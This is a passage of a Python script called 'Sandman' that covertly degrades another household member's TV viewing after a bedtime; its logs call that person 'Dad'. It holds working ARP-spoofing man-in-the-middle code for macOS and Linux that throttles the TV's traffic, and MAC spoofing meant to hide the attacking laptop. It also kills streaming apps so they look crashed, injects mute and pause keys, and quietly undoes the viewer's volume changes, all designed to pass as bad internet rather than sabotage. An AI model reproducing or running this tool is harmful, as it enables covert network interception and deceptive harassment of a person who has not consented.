#!/usr/bin/env python3
"""Sandman — gradually make TV watching unpleasant after bedtime.

Uses UPnP DLNA + Chromecast APIs (no auth required on the Philips 55OLED708).
Multi-vector: audio degradation + video quality degradation + app instability.
Subtle enough that it feels like tiredness + bad internet, not sabotage.

Usage:
    python3 sandman.py                          # default: start at 22:30
    python3 sandman.py --start 23:00            # start at 11pm
    python3 sandman.py --tv 192.168.1.5         # different TV IP
    python3 sandman.py --gateway 192.168.1.1    # gateway for bandwidth throttle
    python3 sandman.py --no-throttle            # skip bandwidth throttling
    python3 sandman.py --dry-run                # just print actions, don't send

Requires for bandwidth throttling (optional, install once):
    pip install scapy      # for ARP spoofing (pure Python, no dsniff needed)
    sudo sysctl -w net.inet.ip.forwarding=1
"""

import argparse
import datetime
import json
import logging
import logging.handlers
import math
import os
import random
import re
import signal
import subprocess
import sys
import threading
import time
import urllib.request

import tv_control

# ─── Logging Setup ────────────────────────────────────────────────────────────

log = logging.getLogger("sandman")


def setup_logging(log_dir: str = None):
    """Configure logging with console + rotating file output."""
    log.setLevel(logging.DEBUG)
    fmt = logging.Formatter(
        "%(asctime)s [%(levelname)s] %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
    )

    # Console (stdout)
    ch = logging.StreamHandler(sys.stdout)
    ch.setLevel(logging.INFO)
    ch.setFormatter(fmt)
    log.addHandler(ch)

    # Rotating file — 5MB max, keep 3 backups
    if log_dir is None:
        log_dir = os.path.dirname(os.path.abspath(__file__))
    log_path = os.path.join(log_dir, "sandman.log")
    fh = logging.handlers.RotatingFileHandler(
        log_path, maxBytes=5 * 1024 * 1024, backupCount=3, encoding="utf-8"
    )
    fh.setLevel(logging.DEBUG)
    fh.setFormatter(fmt)
    log.addHandler(fh)
    log.info(f"Logging to {log_path} (5MB x 3 rotation)")


# ─── MAC Spoofing (hide MacBook identity) ─────────────────────────────────────

def randomize_mac(interface: str = "en0", dry_run: bool = False) -> str | None:
    """Randomize MAC address to hide MacBook as attack source.
    Requires: sudo. Disconnects WiFi briefly during change.
    Returns the new MAC, or None if failed."""
    new_mac = "02:%02x:%02x:%02x:%02x:%02x" % tuple(random.randint(0, 255) for _ in range(5))
    # 02:xx prefix = locally administered, won't collide with real devices
    if dry_run:
        log.info(f"  [DRY] Would spoof MAC to {new_mac}")
        return new_mac
    try:
        # Disconnect WiFi
        subprocess.run(["networksetup", "-setairportpower", interface, "off"],
                       capture_output=True, timeout=5)
        time.sleep(1)
        # Change MAC
        subprocess.run(["sudo", "ifconfig", interface, "ether", new_mac],
                       capture_output=True, timeout=5)
        # Reconnect WiFi
        subprocess.run(["networksetup", "-setairportpower", interface, "on"],
                       capture_output=True, timeout=5)
        time.sleep(5)  # wait for DHCP
        log.info(f"  🎭 MAC spoofed to {new_mac}")
        return new_mac
    except Exception as e:
        log.warning(f" MAC spoof failed: {e}")
        # Re-enable WiFi in case we left it off
        subprocess.run(["networksetup", "-setairportpower", interface, "on"],
                       capture_output=True)
        return None


def restore_mac(interface: str = "en0"):
    """Restore original MAC by cycling the interface (hardware MAC returns on reboot anyway)."""
    try:
        subprocess.run(["networksetup", "-setairportpower", interface, "off"],
                       capture_output=True, timeout=5)
        time.sleep(1)
        subprocess.run(["networksetup", "-setairportpower", interface, "on"],
                       capture_output=True, timeout=5)
        log.info(f"  🎭 MAC restored (hardware default)")
    except Exception:
        pass

# ─── SSDP Auto-Discovery (delegated to tv_control) ───────────────────────────

def discover_tv(timeout: float = 5.0) -> str | None:
    return tv_control.discover_tv(timeout=timeout)


# ─── UPnP / Volume / Mute (delegated to tv_control) ──────────────────────────

CAST_PORT = 8008


def get_volume(tv_ip: str) -> int | None:
    return tv_control.get_volume(ip=tv_ip)


def set_volume(tv_ip: str, volume: int) -> bool:
    return tv_control.set_volume(volume, ip=tv_ip)


def set_mute(tv_ip: str, mute: bool) -> bool:
    return tv_control.set_mute(mute, ip=tv_ip)


def ambilight_off(tv_ip: str) -> bool:
    """Try to turn off Ambilight via JointSpace API."""
    try:
        url = f"http://{tv_ip}:1925/6/ambilight/power"
        data = json.dumps({"power": "Off"}).encode()
        req = urllib.request.Request(url, data=data, method="POST",
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=3) as resp:
            return resp.status == 200
    except Exception:
        return False


def ambilight_on(tv_ip: str) -> bool:
    """Restore Ambilight."""
    try:
        url = f"http://{tv_ip}:1925/6/ambilight/power"
        data = json.dumps({"power": "On"}).encode()
        req = urllib.request.Request(url, data=data, method="POST",
                                     headers={"Content-Type": "application/json"})
        with urllib.request.urlopen(req, timeout=3) as resp:
            return resp.status == 200
    except Exception:
        return False


# ─── Chromecast Helpers ───────────────────────────────────────────────────────

def cast_get_status(tv_ip: str) -> dict | None:
    """Get Chromecast app status."""
    try:
        url = f"http://{tv_ip}:{CAST_PORT}/setup/eureka_info?options=detail"
        req = urllib.request.Request(url, method="GET")
        with urllib.request.urlopen(req, timeout=3) as resp:
            return json.loads(resp.read())
    except Exception:
        return None


def cast_kill_app(tv_ip: str, app_id: str = "CC1AD845") -> bool:
    """Kill a Chromecast app. CC1AD845 = default media receiver (Netflix uses this)."""
    try:
        url = f"http://{tv_ip}:{CAST_PORT}/apps/{app_id}"
        req = urllib.request.Request(url, method="DELETE")
        with urllib.request.urlopen(req, timeout=5) as resp:
            return resp.status in (200, 204)
    except Exception:
        return False


def cast_set_volume(tv_ip: str, level: float) -> bool:
    """Set Chromecast volume (0.0 to 1.0)."""
    try:
        url = f"http://{tv_ip}:{CAST_PORT}/setup/assistant/set_night_mode_params"
        # Fallback: use eureka_info to adjust volume
        # The DIAL API doesn't directly expose volume, but we can try the setup API
        return False  # Chromecast volume via HTTP is limited; rely on UPnP
    except Exception:
        return False


# ─── Bandwidth Throttling (ARP spoof + dummynet) ─────────────────────────────

class BandwidthThrottler:
    """Throttle TV's bandwidth via ARP spoofing (scapy) + macOS dummynet (pf/dnctl).

    Requires: pip install scapy, and running as root for pf/dnctl/raw sockets.
    """

    def __init__(self, tv_ip: str, gateway_ip: str, interface: str = "en0"):
        self.tv_ip = tv_ip
        self.gateway_ip = gateway_ip
        self.interface = interface
        self.active = False
        self.current_bw = None  # kbit/s
        self._spoof_thread = None
        self._stop_spoof = threading.Event()
        self._tv_mac = None
        self._gw_mac = None

    def is_available(self) -> bool:
        """Check if scapy is importable and we can run as root."""
        try:
            import scapy.all  # noqa: F401
            return os.geteuid() == 0
        except ImportError:
            return False

    def _resolve_mac(self, ip: str) -> str | None:
        """Resolve MAC address. Uses ping first (kernel ARP) then falls back to scapy.
        Ping-based resolution works across WiFi↔ethernet bridge where scapy broadcast may not."""
        import re as _re
        # Method 1: ping to populate kernel ARP cache, then read it
        subprocess.run(["ping", "-c", "1", "-t", "2", ip],
                       capture_output=True, timeout=5)
        result = subprocess.run(["arp", "-n", ip], capture_output=True)
        output = result.stdout.decode()
        m = _re.search(r'([\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2})', output, _re.I)
        if m:
            return m.group(1)
        # Method 2: scapy unicast ARP (broadcast may be filtered by router)
        from scapy.all import ARP, Ether, srp, conf
        conf.verb = 0
        ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                      timeout=2, iface=self.interface)
        for _, rcv in ans:
            return rcv[Ether].src
        return None

    def _spoof_loop(self):
        from scapy.all import ARP, Ether, sendp, conf
        conf.verb = 0
        # Tell TV: we are the gateway (psrc=gateway IP, sent to TV's MAC)
        pkt_to_tv = (Ether(dst=self._tv_mac) /
                     ARP(op=2, psrc=self.gateway_ip, pdst=self.tv_ip,
                         hwdst=self._tv_mac))
        # Tell gateway: we are the TV (psrc=TV IP, sent to gateway's MAC)
        pkt_to_gw = (Ether(dst=self._gw_mac) /
                     ARP(op=2, psrc=self.tv_ip, pdst=self.gateway_ip,
                         hwdst=self._gw_mac))
        while not self._stop_spoof.is_set():
            sendp([pkt_to_tv, pkt_to_gw], iface=self.interface, verbose=False)
            self._stop_spoof.wait(1)

    def start_arp_spoof(self):
        """Start ARP spoofing via scapy in a background thread."""
        if self.active:
            return
        self._tv_mac = self._resolve_mac(self.tv_ip)
        self._gw_mac = self._resolve_mac(self.gateway_ip)
        if not self._tv_mac or not self._gw_mac:
            log.warning(f" Could not resolve MACs (TV={self._tv_mac}, GW={self._gw_mac})")
            return
        # Enable IP forwarding
        subprocess.run(["sysctl", "-w", "net.inet.ip.forwarding=1"],
                       capture_output=True)
        self._stop_spoof.clear()
        self._spoof_thread = threading.Thread(target=self._spoof_loop, daemon=True)
        self._spoof_thread.start()
        self.active = True
        log.info(f"  🔀 ARP spoof active (TV={self._tv_mac}, GW={self._gw_mac})")

    def set_bandwidth(self, kbits: int):
        """Set bandwidth limit for TV traffic using dummynet pipe.
        Uses macOS-correct 'dummynet in/out' syntax in main pf config.
        Throttles ALL protocols (TCP + UDP/QUIC) — YouTube uses QUIC over UDP."""
        if not self.active:
            self.start_arp_spoof()

        self.current_bw = kbits

        # Configure dummynet pipe
        subprocess.run(["dnctl", "pipe", "1", "config", "bw", f"{kbits}Kbit/s",
                        "queue", "5"], capture_output=True)

        # macOS pf uses 'dummynet in/out' (not 'pass ... pipe N' which is FreeBSD-only)
        # Rules must go into main pf config, not an anchor
        # Preserve existing system rules and prepend our dummynet rules
        existing = subprocess.run(["pfctl", "-s", "rules"],
                                  capture_output=True).stdout.decode()
        pf_rules = f'dummynet in quick on {self.interface} from {self.tv_ip} to any pipe 1\n'
        pf_rules += f'dummynet out quick on {self.interface} from any to {self.tv_ip} pipe 1\n'
        pf_rules += existing

        with open("/tmp/sandman_pf.conf", "w") as f:
            f.write(pf_rules)

        subprocess.run(["pfctl", "-f", "/tmp/sandman_pf.conf"],
                       capture_output=True)
        subprocess.run(["pfctl", "-e"], capture_output=True)

    def stop(self):
        """Clean up: stop ARP spoof, remove throttle, restore ARP tables."""
        # Stop spoof thread
        if self._spoof_thread:
            self._stop_spoof.set()
            self._spoof_thread.join(timeout=3)
            self._spoof_thread = None

        # Restore correct ARP entries
        if self._tv_mac and self._gw_mac:
            from scapy.all import ARP, Ether, sendp, conf
            conf.verb = 0
            restore_tv = (Ether(dst=self._tv_mac) /
                          ARP(op=2, psrc=self.gateway_ip, pdst=self.tv_ip,
                              hwsrc=self._gw_mac, hwdst=self._tv_mac))
            restore_gw = (Ether(dst=self._gw_mac) /
                          ARP(op=2, psrc=self.tv_ip, pdst=self.gateway_ip,
                              hwsrc=self._tv_mac, hwdst=self._gw_mac))
            for _ in range(5):
                sendp([restore_tv, restore_gw], iface=self.interface, verbose=False)
                time.sleep(0.2)

        # Flush dummynet pipe
        subprocess.run(["dnctl", "pipe", "delete", "1"], capture_output=True)
        # Restore original pf rules (removes our dummynet rules)
        subprocess.run(["pfctl", "-f", "/etc/pf.conf"], capture_output=True)
        # Disable forwarding
        subprocess.run(["sysctl", "-w", "net.inet.ip.forwarding=0"], capture_output=True)
        self.active = False
        self.current_bw = None


# ─── Linux Bandwidth Throttling (ARP spoof + tc) ─────────────────────────────

class LinuxBandwidthThrottler:
    """Throttle TV bandwidth via ARP spoofing (raw sockets) + tc (iproute2).

    For Linux (Raspberry Pi / HA addon). Uses raw AF_PACKET sockets for ARP
    spoofing (no scapy needed), and tc HTB qdiscs for rate limiting.

    Requires: iproute2 (apk add iproute2), NET_ADMIN capability, host_network.
    """

    IFACE = "end0"
    GATEWAY_IP = "192.168.1.254"

    def __init__(self, tv_ip: str, gateway_ip: str = None, interface: str = None):
        self.tv_ip = tv_ip
        self.gateway_ip = gateway_ip or self.GATEWAY_IP
        self.interface = interface or self.IFACE
        self.active = False
        self.current_bw = None  # kbit/s
        self._spoof_thread = None
        self._stop_spoof = threading.Event()
        self._tv_mac = None
        self._gw_mac = None
        self._our_mac = None
        self._tc_applied = False

    def is_available(self) -> bool:
        """Check if tc (iproute2) is installed and we have permissions."""
        try:
            result = subprocess.run(["tc", "-V"], capture_output=True, timeout=5)
            return result.returncode == 0 and os.geteuid() == 0
        except (FileNotFoundError, subprocess.TimeoutExpired):
            return False

    def _get_our_mac(self) -> bytes:
        """Get MAC address of our interface via /sys."""
        try:
            with open(f"/sys/class/net/{self.interface}/address") as f:
                mac_str = f.read().strip()
            return bytes.fromhex(mac_str.replace(":", ""))
        except Exception:
            return None

    def _resolve_mac(self, ip: str) -> bytes | None:
        """Resolve IP to MAC via ping + ARP cache lookup. Returns raw 6 bytes."""
        import re as _re
        try:
            subprocess.run(["ping", "-c", "1", "-W", "2", ip],
                           capture_output=True, timeout=5)
        except (subprocess.TimeoutExpired, FileNotFoundError):
            pass
        # Read kernel ARP cache
        try:
            result = subprocess.run(["ip", "neigh", "show", ip],
                                    capture_output=True, timeout=5)
            output = result.stdout.decode()
            m = _re.search(
                r'([\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2}:[\da-f]{1,2})',
                output, _re.I)
            if m:
                return bytes.fromhex(m.group(1).replace(":", "").zfill(12))
        except (subprocess.TimeoutExpired, FileNotFoundError):
            pass
        # Fallback: read /proc/net/arp
        try:
            with open("/proc/net/arp") as f:
                for line in f:
                    if ip in line:
                        m = _re.search(
                            r'([\da-f]{2}:[\da-f]{2}:[\da-f]{2}:[\da-f]{2}:[\da-f]{2}:[\da-f]{2})',
                            line, _re.I)
                        if m:
                            return bytes.fromhex(m.group(1).replace(":", ""))
        except Exception:
            pass
        return None

    def _build_arp_reply(self, src_mac: bytes, src_ip: str,
                         dst_mac: bytes, dst_ip: str) -> bytes:
        """Build a raw Ethernet + ARP reply frame."""
        import struct, socket as _socket
        # Ethernet header: dst + src + ethertype 0x0806
        eth = dst_mac + src_mac + b'\x08\x06'
        # ARP: hw=Ethernet(1), proto=IPv4(0x0800), hw_len=6, proto_len=4, op=reply(2)
        arp = struct.pack('!HHBBH', 1, 0x0800, 6, 4, 2)
        arp += src_mac + _socket.inet_aton(src_ip)
        arp += dst_mac + _socket.inet_aton(dst_ip)
        return eth + arp

    def _spoof_loop(self):
        """Send poisoned ARP replies every ~1s."""
        import socket as _socket
        try:
            sock = _socket.socket(_socket.AF_PACKET, _socket.SOCK_RAW, _socket.htons(0x0003))
            sock.bind((self.interface, 0))
        except Exception as e:
            log.warning(f"  ARP spoof socket failed: {e}")
            return

        # Tell TV: we are the gateway (our MAC, gateway's IP → TV)
        pkt_to_tv = self._build_arp_reply(
            self._our_mac, self.gateway_ip, self._tv_mac, self.tv_ip)
        # Tell gateway: we are the TV (our MAC, TV's IP → gateway)
        pkt_to_gw = self._build_arp_reply(
            self._our_mac, self.tv_ip, self._gw_mac, self.gateway_ip)

        try:
            while not self._stop_spoof.is_set():
                try:
                    sock.send(pkt_to_tv)
                    sock.send(pkt_to_gw)
                except Exception:
                    pass
                self._stop_spoof.wait(1)
        finally:
            sock.close()

    def _run_tc(self, *args) -> bool:
        """Run a tc command. Returns True on success."""
        cmd = ["tc"] + list(args)
        try:
            result = subprocess.run(cmd, capture_output=True, timeout=10)
            if result.returncode != 0:
                stderr = result.stderr.decode().strip()
                if stderr and "RTNETLINK answers: File exists" not in stderr:
                    log.debug(f"  tc cmd failed: {' '.join(cmd)} → {stderr}")
                return result.returncode == 0
            return True
        except (FileNotFoundError, subprocess.TimeoutExpired) as e:
            log.warning(f"  tc command error: {e}")
            return False

    def start(self, bandwidth_kbps: int):
        """Start ARP spoof + tc throttle."""
        if not self.is_available():
            log.warning("  tc/iproute2 not available or not root — skipping throttle")
            return False

        # Resolve MACs
        self._our_mac = self._get_our_mac()
        self._tv_mac = self._resolve_mac(self.tv_ip)
        self._gw_mac = self._resolve_mac(self.gateway_ip)

        if not self._our_mac or not self._tv_mac or not self._gw_mac:
            log.warning(f"  MAC resolution failed (us={self._our_mac}, "
                        f"TV={self._tv_mac}, GW={self._gw_mac}) — skipping throttle")
            return False

        # Enable IP forwarding
        subprocess.run(["sysctl", "-w", "net.ipv4.ip_forward=1"],
                       capture_output=True)

        # Start ARP spoofing
        self._stop_spoof.clear()
        self._spoof_thread = threading.Thread(target=self._spoof_loop, daemon=True,
                                              name="arp-spoof")
        self._spoof_thread.start()

        # Apply tc rules
        self._apply_tc(bandwidth_kbps)

        self.active = True
        self.current_bw = bandwidth_kbps
        mac_fmt = lambda b: ":".join(f"{x:02x}" for x in b) if b else "?"
        log.info(f"  🔀 Linux throttle active: {bandwidth_kbps}kbps "
                 f"(TV={mac_fmt(self._tv_mac)}, GW={mac_fmt(self._gw_mac)})")
        return True

    def _apply_tc(self, bandwidth_kbps: int):
        """Set up HTB qdisc + filter to rate-limit traffic to the TV."""
        # Clean any existing rules first
        self._cleanup_tc()

        iface = self.interface
        bw = str(bandwidth_kbps)

        # Root HTB qdisc — default class 10 (full speed)
        self._run_tc("qdisc", "add", "dev", iface, "root", "handle", "1:", "htb",
                     "default", "10")
        # Default class: full speed
        self._run_tc("class", "add", "dev", iface, "parent", "1:", "classid", "1:10",
                     "htb", "rate", "1000mbit")
        # Throttled class
        self._run_tc("class", "add", "dev", iface, "parent", "1:", "classid", "1:20",
                     "htb", "rate", f"{bw}kbit", "ceil", f"{bw}kbit")
        # Filter: match TV destination IP → throttled class
        self._run_tc("filter", "add", "dev", iface, "parent", "1:", "protocol", "ip",
                     "prio", "1", "u32", "match", "ip", "dst", f"{self.tv_ip}/32",
                     "flowid", "1:20")
        self._tc_applied = True

    def _cleanup_tc(self):
        """Remove all tc rules from the interface."""
        subprocess.run(["tc", "qdisc", "del", "dev", self.interface, "root"],
                       capture_output=True, timeout=10)
        self._tc_applied = False

    def _restore_arp(self):
        """Send correct ARP entries to restore the network."""
        if not self._tv_mac or not self._gw_mac:
            return
        import socket as _socket
        try:
            sock = _socket.socket(_socket.AF_PACKET, _socket.SOCK_RAW, _socket.htons(0x0003))
            sock.bind((self.interface, 0))
            # Tell TV: gateway's real MAC
            restore_tv = self._build_arp_reply(
                self._gw_mac, self.gateway_ip, self._tv_mac, self.tv_ip)
            # Tell gateway: TV's real MAC
            restore_gw = self._build_arp_reply(
                self._tv_mac, self.tv_ip, self._gw_mac, self.gateway_ip)
            for _ in range(5):
                sock.send(restore_tv)
                sock.send(restore_gw)
                time.sleep(0.2)
            sock.close()
        except Exception as e:
            log.warning(f"  ARP restore failed: {e}")

    def stop(self):
        """Clean up everything: stop ARP spoof, remove tc rules, restore ARP."""
        # Stop spoof thread
        if self._spoof_thread:
            self._stop_spoof.set()
            self._spoof_thread.join(timeout=3)
            self._spoof_thread = None

        # Remove tc rules
        if self._tc_applied:
            self._cleanup_tc()

        # Restore correct ARP entries
        self._restore_arp()

        # Disable IP forwarding
        subprocess.run(["sysctl", "-w", "net.ipv4.ip_forward=0"],
                       capture_output=True)

        self.active = False
        self.current_bw = None
        log.info("  🔀 Linux throttle stopped, ARP restored")


# ─── Disruption Actions ──────────────────────────────────────────────────────

def audio_glitch(tv_ip: str, duration_ms: int = 800, style: str = "single"):
    """Audio disruption with multiple styles.
    Styles:
      single  — one mute/unmute (classic dropout)
      stutter — rapid on-off-on-off (sounds like buffering/packet loss)
      fade    — drop volume to 3 for duration then restore (gradual, eerie)
    """
    if style == "stutter":
        # Rapid stutter: 3-5 quick blips
        for _ in range(random.randint(3, 5)):
            set_mute(tv_ip, True)
            time.sleep(random.uniform(0.1, 0.3))
            set_mute(tv_ip, False)
            time.sleep(random.uniform(0.05, 0.15))
    elif style == "fade":
        # Save current volume, drop to near-silent, restore
        orig = get_volume(tv_ip)
        if orig is not None:
            set_volume(tv_ip, 3)
            time.sleep(duration_ms / 1000)
            set_volume(tv_ip, orig)
    else:
        # Classic single dropout
        set_mute(tv_ip, True)
        time.sleep(duration_ms / 1000)
        set_mute(tv_ip, False)


def ambilight_glitch(tv_ip: str, off_duration: float = 3.0):
    """Toggle Ambilight off then on via menu navigation."""
    tv_control.ambilight_glitch(off_duration, ip=tv_ip)


def _ambilight_toggle_via_menu(tv_ip: str):
    """Toggle ambilight using menu navigation (only reliable method on this TV)."""
    tv_control.ambilight_toggle(ip=tv_ip)


def netflix_crash(tv_ip: str):
    """Kill the Netflix/media app via Chromecast — looks like app crash."""
    # Try multiple app IDs: default receiver, Netflix-specific
    cast_kill_app(tv_ip, "CC1AD845")  # Default media receiver
    cast_kill_app(tv_ip, "CA5E8412")  # Netflix


# ─── JointSpace Control (delegated to tv_control) ────────────────────────────

def js_key(tv_ip: str, key_name: str) -> bool:
    """Send a key press via JointSpace."""
    return tv_control.js_key(key_name, ip=tv_ip)

def js_get(tv_ip: str, endpoint: str):
    """GET a JointSpace endpoint."""
    return tv_control.js_get(endpoint, ip=tv_ip)

def detect_program(tv_ip: str) -> str:
    """Detect what program/app is active on the TV.
    Returns: 'youtube', 'netflix', 'prime', 'livetv', 'home', 'off', or 'unknown'."""
    power = js_get(tv_ip, '/powerstate')
    if not power or power.get('powerstate') != 'On':
        return 'off'
    activity = js_get(tv_ip, '/activities/current')
    if not activity:
        return 'unknown'
    pkg = activity.get('component', {}).get('packageName', 'NA')
    if 'youtube' in pkg.lower():
        return 'youtube'
    elif 'netflix' in pkg.lower():
        return 'netflix'
    elif 'amazon' in pkg.lower() or 'prime' in pkg.lower():
        return 'prime'
    elif 'playtv' in pkg.lower() or 'channels' in pkg.lower():
        return 'livetv'
    elif 'launcher' in pkg.lower() or pkg == 'NA':
        return 'home'
    else:
        return 'unknown'


def program_disruption(tv_ip: str, program: str, phase: int):
    """Program-aware disruption. Adapts tactics to what's playing."""
    if program == 'off' or program == 'home':
        return  # nothing to disrupt

    # Universal: audio glitch (works on everything)
    if random.random() < 0.1 * phase:
        style = random.choice(['single', 'stutter']) if phase <= 2 else random.choice(['stutter', 'fade'])
        dur = random.randint(300, 1500)
        audio_glitch(tv_ip, dur, style)
        now = datetime.datetime.now().strftime("%H:%M:%S")
        log.info(f"  [{now}]   💥 Audio {style} ({dur}ms) [{program}]")

    # Program-specific disruptions via JointSpace
    if program == 'youtube':
        # YouTube: occasional pause (looks like buffering)
        if random.random() < 0.05 * phase:
            js_key(tv_ip, 'Pause')
            time.sleep(random.uniform(2, 5))
            js_key(tv_ip, 'Play')
            now = datetime.datetime.now().strftime("%H:%M:%S")
            log.info(f"  [{now}]   ⏸️  YouTube pause/play [{program}]")
        # Late phases: navigate away
        if phase >= 4 and random.random() < 0.15:
            js_key(tv_ip, 'Home')
            now = datetime.datetime.now().strftime("%H:%M:%S")
            log.info(f"  [{now}]   🏠 Kicked to Home [{program}]")

    elif program == 'netflix':
        # Netflix: pause looks like buffering
        if random.random() < 0.05 * phase:
            js_key(tv_ip, 'Pause')
            time.sleep(random.uniform(3, 8))
            js_key(tv_ip, 'Play')
            now = datetime.datetime.now().strftime("%H:%M:%S")
            log.info(f"  [{now}]   ⏸️  Netflix pause/play [{program}]")

    elif program == 'prime':
        # Prime: same as Netflix
        if random.random() < 0.05 * phase:
            js_key(tv_ip, 'Pause')
            time.sleep(random.uniform(3, 8))
            js_key(tv_ip, 'Play')
            now = datetime.datetime.now().strftime("%H:%M:%S")
            log.info(f"  [{now}]   ⏸️  Prime pause/play [{program}]")

    elif program == 'livetv':
        # Live TV: channel flip (very annoying)
        if phase >= 3 and random.random() < 0.1:
            js_key(tv_ip, 'ChannelStepUp')
            time.sleep(random.uniform(3, 10))
            js_key(tv_ip, 'ChannelStepDown')
            now = datetime.datetime.now().strftime("%H:%M:%S")
            log.info(f"  [{now}]   📺 Channel flip [{program}]")

    # Ambilight flicker (all programs, subtle)
    if random.random() < 0.03 * phase:
        ambilight_glitch(tv_ip)
        now = datetime.datetime.now().strftime("%H:%M:%S")
        log.info(f"  [{now}]   💡 Ambilight flicker [{program}]")


# ─── Volume Watchdog ─────────────────────────────────────────────────────────

class VolumeWatchdog:
    """Background thread that monitors volume and corrects fight-backs.
    Waits a random delay before correcting so it feels like a 'drift' not a snap."""

    def __init__(self, tv_ip: str, correction_delay: tuple = (8, 20)):
        self.tv_ip = tv_ip
        self.target_volume = None  # set by main loop
        self.correction_delay = correction_delay  # (min_sec, max_sec)
        self._stop = threading.Event()
        self._thread = None
        self.fight_backs = 0

    def start(self):
        self._thread = threading.Thread(target=self._run, daemon=True)
        self._thread.start()

    def stop(self):
        self._stop.set()
        if self._thread:
            self._thread.join(timeout=3)

    def _run(self):
        while not self._stop.is_set():
            if self.target_volume is not None:
                current = get_volume(self.tv_ip)
                if current is not None and current > self.target_volume + 1:
                    self.fight_backs += 1
                    now = datetime.datetime.now().strftime("%H:%M:%S")
                    log.info(f"  [{now}] 👴 Fight-back detected: {current} > target {self.target_volume}")
                    # Wait a random delay before correcting — feels like drift
                    delay = random.uniform(*self.correction_delay)
                    self._stop.wait(delay)
                    if self._stop.is_set():
                        break
                    # Correct back, but not all the way — meet halfway to be subtle
                    corrected = self.target_volume + random.randint(0, 2)
                    set_volume(self.tv_ip, corrected)
                    now = datetime.datetime.now().strftime("%H:%M:%S")
                    log.info(f"  [{now}]    ↩️  Corrected to {corrected} (after {delay:.0f}s)")
            self._stop.wait(random.uniform(3, 6))  # poll every 3-6 seconds


# ─── Main Loop ────────────────────────────────────────────────────────────────

# Legacy run() and minutes_since() removed in v4. Use run_v4() with config file.


def _legacy_run_removed():
    """Legacy run() function removed in v4. All logic now in run_v4()."""
    raise NotImplementedError("Use run_v4() or python3 sandman.py (no --legacy)")


def _old_run(tv_ip: str, gateway_ip: str, start_time: str, dry_run: bool = False,
        throttle: bool = True, spoof_mac: bool = False):
    start_h, start_m = map(int, start_time.split(":"))
    bedtime = datetime.time(start_h, start_m)

    # Spoof MAC first (before any network activity)
    if spoof_mac and not dry_run:
        log.info("  🎭 Spoofing MAC address to hide MacBook identity...")
        if os.geteuid() != 0:
            log.warning(" MAC spoofing requires sudo. Run: sudo python3 sandman.py --spoof-mac")
        else:
            randomize_mac()
    elif spoof_mac and dry_run:
        randomize_mac(dry_run=True)

    throttler = None
    if throttle and not dry_run:
        throttler = BandwidthThrottler(tv_ip, gateway_ip)
        if throttler.is_available():
            log.info(f"  Bandwidth throttling: ENABLED (running as root)")
        else:
            log.info(f"  Bandwidth throttling: DISABLED")
            log.info(f"    To enable: pip install scapy && sudo python3 sandman.py")
            throttler = None

    # Auto-discover TV if not specified or if using default
    if tv_ip == "auto" or tv_ip is None:
        log.info("  🔍 Auto-discovering TV via SSDP...")
        tv_ip = discover_tv()
        if tv_ip:
            log.info(f"  📺 Found TV at {tv_ip}")
        else:
            log.warning(" TV not found — will retry on each cycle")

    log.info(f"🌙 Sandman v2 active. Target: {tv_ip or 'auto-discover'}")
    log.info(f"   Bedtime starts at {start_time}")
    log.info(f"   Vectors: volume + audio glitch + ambilight + app crash"
          + (" + bandwidth throttle" if throttler else ""))
    log.info(f"   Dry run: {dry_run}")
    log.info("")

    # Start volume watchdog (corrects fight-backs between cycles)
    watchdog = VolumeWatchdog(tv_ip) if not dry_run else None

    def cleanup(sig=None, frame=None):
        log.info("\n  🌅 Sandman shutting down. Restoring network...")
        if watchdog:
            watchdog.stop()
        if throttler:
            throttler.stop()
        if spoof_mac and not dry_run:
            restore_mac()
        sys.exit(0)

    signal.signal(signal.SIGINT, cleanup)
    signal.signal(signal.SIGTERM, cleanup)

    prev_volume = None
    fight_back_count = 0
    cycle_count = 0
    prev_program = None

    while True:
        elapsed = minutes_since(bedtime)

        if elapsed < 0:
            now_str = datetime.datetime.now().strftime("%H:%M:%S")
            log.debug(f"Waiting for {start_time}...")
            time.sleep(60)
            continue

        # Get current volume
        current = None if dry_run else get_volume(tv_ip)
        now_str = datetime.datetime.now().strftime("%H:%M:%S")

        if current is None and not dry_run:
            # TV unreachable — try auto-discovery in case IP changed
            log.info(f"  [{now_str}] TV unreachable at {tv_ip} — scanning...")
            new_ip = discover_tv(timeout=5)
            if new_ip and new_ip != tv_ip:
                tv_ip = new_ip
                log.info(f"  [{now_str}] 📺 TV moved to {tv_ip}")
                if watchdog:
                    watchdog.tv_ip = tv_ip
                current = get_volume(tv_ip)
            if current is None:
                log.debug(f"TV off or not found — checking in 2 min.")
                time.sleep(120)
                continue

        if dry_run:
            current = prev_volume or 20

        # Detect fight-back
        if prev_volume is not None and current is not None and current > prev_volume + 1:
            fight_back_count += 1
            log.info(f"  [{now_str}] 👴 Dad fought back! Vol {prev_volume} → {current} "
                  f"(#{fight_back_count})")

        cycle_count += 1

        # ─── Phase Parameters ────────────────────────────────────────────
        # Intervals are in MINUTES. Disruptions are spaced out and random.
        #                    vol_drop  interval     audio%  pause%  ambi%  back/home%
        # Phase 1 (0-30m):    1       8-15 min      8%      3%     2%     0%
        # Phase 2 (30-60m):   1-2     5-10 min     15%      5%     5%     2%
        # Phase 3 (60-90m):   1-3     3-7 min      25%     10%     8%     5%
        # Phase 4 (90m+):     2-4     2-5 min      35%     15%    10%     8%

        if elapsed < 30:
            phase = 1
            vol_drop = 1
            interval = random.randint(8, 15) * 60
            p_audio, p_video, p_crash = 0.08, 0.02, 0.00
            p_pause, p_ambi, p_nav = 0.03, 0.02, 0.00
            bw_target = 5000
        elif elapsed < 60:
            phase = 2
            vol_drop = random.randint(1, 2)
            interval = random.randint(5, 10) * 60
            p_audio, p_video, p_crash = 0.15, 0.05, 0.02
            p_pause, p_ambi, p_nav = 0.05, 0.05, 0.02
            bw_target = 2000
        elif elapsed < 90:
            phase = 3
            vol_drop = random.randint(1, 3)
            interval = random.randint(3, 7) * 60
            p_audio, p_video, p_crash = 0.25, 0.08, 0.05
            p_pause, p_ambi, p_nav = 0.10, 0.08, 0.05
            bw_target = 800
        else:
            phase = 4
            vol_drop = random.randint(2, 4)
            interval = random.randint(2, 5) * 60
